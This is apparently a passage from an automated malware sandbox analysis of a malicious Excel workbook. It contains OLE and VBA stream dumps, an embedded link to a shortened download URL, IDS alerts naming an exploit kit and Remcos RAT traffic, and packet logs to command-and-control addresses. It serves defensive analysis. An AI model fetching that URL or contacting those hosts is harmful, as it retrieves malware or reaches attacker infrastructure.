                                                                                                      VBA File Name:Sheet2.cls
                                                                                                      Stream Size:977
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 74 98 14 e5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Attribute VB_Name = "Sheet2"
                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                      Attribute VB_Creatable = False
                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                      Attribute VB_Exposed = True
                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                      Attribute VB_Customizable = True
                                                                                                      

                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                      VBA File Name:Sheet3.cls
                                                                                                      Stream Size:977
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t 3 . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 74 98 33 0c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Attribute VB_Name = "Sheet3"
                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                      Attribute VB_Creatable = False
                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                      Attribute VB_Exposed = True
                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                      Attribute VB_Customizable = True
                                                                                                      

                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                      VBA File Name:ThisWorkbook.cls
                                                                                                      Stream Size:985
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t 9 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 74 98 a2 39 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Attribute VB_Name = "ThisWorkbook"
                                                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                      Attribute VB_Creatable = False
                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                      Attribute VB_Exposed = True
                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                      Attribute VB_Customizable = True
                                                                                                      

                                                                                                      General
                                                                                                      Stream Path:\x1CompObj
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:114
                                                                                                      Entropy:4.25248375192737
                                                                                                      Base64 Encoded:True
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      General
                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:244
                                                                                                      Entropy:2.889430592781307
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                      General
                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:200
                                                                                                      Entropy:3.1947979788081455
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . s . . . . . . . . . . .
                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                      General
                                                                                                      Stream Path:MBD003D5860/\x1CompObj
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:99
                                                                                                      Entropy:3.631242196770981
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      General
                                                                                                      Stream Path:MBD003D5860/Package
                                                                                                      CLSID:
                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                      Stream Size:323372
                                                                                                      Entropy:7.9851985474292935
                                                                                                      Base64 Encoded:True
                                                                                                      Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 94 ec d8 8a aa 01 00 00 c0 06 00 00 13 00 d6 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d2 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      General
                                                                                                      Stream Path:MBD003D5861/\x1Ole
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:356
                                                                                                      Entropy:5.93375527116359
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . W . 0 d : . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . t . r . m . r . . . c . o . / . a . 9 . i . f . F . T . . . N ] 9 o 6 . . - . . . M . 3 c . . . M I 9 N . . . U / . . L B / . U 1 . 2 x } V | A J . . c $ { . | R x M [ H . . . . . M * . . . . h X g . 7 w ` m > . d . . . . . . . . . . . . . . . . . @ . . . J . 3 . r . w . M . E . D . T . k . n . 3 . q . 6 . z . f . c . Q . P . L . f . B . Y . E . d . E . M . r . 8 . q . h . Q . . . _ * y . X J . w 5 \\ ) M T
                                                                                                      Data Raw:01 00 00 02 f1 57 a9 03 30 e7 64 3a 00 00 00 00 00 00 00 00 00 00 00 00 c4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c0 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 74 00 72 00 6d 00 72 00 2e 00 63 00 6f 00 2f 00 61 00 39 00 69 00 66 00 46 00 54 00 00 00 4e 5d ca 39 6f e4 36 a9 e4 da 14 ea 81 92 2d 97 d0 87 1b 17 4d 91 8e cc a9 33 8a 63 0c d0 a4 09
                                                                                                      General
                                                                                                      Stream Path:Workbook
                                                                                                      CLSID:
                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                      Stream Size:379921
                                                                                                      Entropy:7.998962777529194
                                                                                                      Base64 Encoded:True
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . i d - . & . . ~ 0 + X 4 G B i f . . / . 3 E . . . . . . . . . { . . . \\ . p . . I . J . Z z Q p q . n 7 . o . d K L . z . . . Q v . n A . q f d . r . & . . $ g . i . U g P . ` 8 . > u 0 3 , F 9 . . { B . . . 6 ] a . . . . > . . . = . . . r v ] & . . . 2 r W . O u 5 < . . . % . . . . . . . . . . . . . . 9 . . . . . . = . . . L B Q k i . G . . @ . . . ~ . . . [ h " . . . d . . . . . . . . . u . . . & % 1 . . . . ( z . t 8 ' ? ~ p . ~ ] . O [ 1 . . . Y ; P
                                                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 f3 a5 69 64 a5 2d b1 9c ce bc a3 96 26 90 90 e7 16 93 ef aa 04 ce 7e 30 2b c0 58 c6 34 47 42 69 a1 cd 66 06 b7 b6 1b 2f 1a 33 9b b5 45 bc 0a 16 e1 00 02 00 b0 04 c1 00 02 00 c1 7b e2 00 00 00 5c 00 70 00 1f 49 82 08 4a d4 a4 a7 5a 7a 83 a3 a0 f4 51 bf 70 8c 71 18 6e 37 1e 6f b4 c0 83 f8 1d 64
                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                      CLSID:
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Stream Size:533
                                                                                                      Entropy:5.273446452538851
                                                                                                      Base64 Encoded:True
                                                                                                      Data ASCII:I D = " { 5 1 6 C 4 3 6 C - 5 9 3 4 - 4 9 5 C - A D 5 D - 6 1 D F D C B 3 5 C 8 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 5 4 7 B 5 0 6 D 7 3 3 D B 3 3 D
                                                                                                      Data Raw:49 44 3d 22 7b 35 31 36 43 34 33 36 43 2d 35 39 33 34 2d 34 39 35 43 2d 41 44 35 44 2d 36 31 44 46 44 43 42 33 35 43 38 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:104
                                                                                                      Entropy:3.0488640812019017
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:2644
                                                                                                      Entropy:3.978121863432822
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                      CLSID:
                                                                                                      File Type:data
                                                                                                      Stream Size:553
                                                                                                      Entropy:6.346859478693808
                                                                                                      Base64 Encoded:True
                                                                                                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . m . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 01 6d 07 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-09-27T12:51:55.558444+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11104.168.32.14880192.168.2.2249174TCP
                                                                                                      2024-09-27T12:51:55.558444+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11104.168.32.14880192.168.2.2249174TCP
                                                                                                      2024-09-27T12:52:30.703257+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917545.134.140.6850312TCP
                                                                                                      2024-09-27T12:52:59.119714+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917645.134.140.6850312TCP
                                                                                                      2024-09-27T12:54:23.160130+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917745.134.140.6850312TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 27, 2024 12:51:31.122769117 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:31.122807026 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:31.122865915 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:31.128340960 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:31.128357887 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:31.613385916 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:31.613529921 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:31.622206926 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:31.622231007 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:31.622692108 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:31.622769117 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:31.696728945 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:31.743402958 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.097878933 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.097963095 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.098012924 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:32.098046064 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:32.145519972 CEST49163443192.168.2.22172.67.179.215
                                                                                                      Sep 27, 2024 12:51:32.145543098 CEST44349163172.67.179.215192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.160811901 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.165710926 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.165781975 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.165882111 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.170623064 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661026955 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661046028 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661057949 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661099911 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661111116 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661117077 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.661117077 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.661123037 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661139965 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.661174059 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.661339045 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661350965 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661360979 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661371946 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.661727905 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.661727905 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.666007996 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.666033983 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.666044950 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.666074038 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.666110992 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.696352959 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.753273964 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.753315926 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.753325939 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.753379107 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.753379107 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.753390074 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.753401995 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.753413916 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.753456116 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.753456116 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754070044 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754153013 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754153967 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754165888 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754230022 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754261017 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754272938 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754282951 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754359007 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754812002 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754859924 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754859924 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754873991 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754885912 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.754931927 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754931927 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.754971981 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.755027056 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.755366087 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.755409956 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.755431890 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.755445004 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.755502939 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.755563021 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.755574942 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.755582094 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.755598068 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.755660057 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.756333113 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.756391048 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.758217096 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.758280993 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.758286953 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.758311033 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.758346081 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.758347034 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.846340895 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.846366882 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.846379042 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.846420050 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.846431971 CEST8049164104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:32.846472025 CEST4916480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:32.846546888 CEST8049164104.168.32.148192.168.2.22
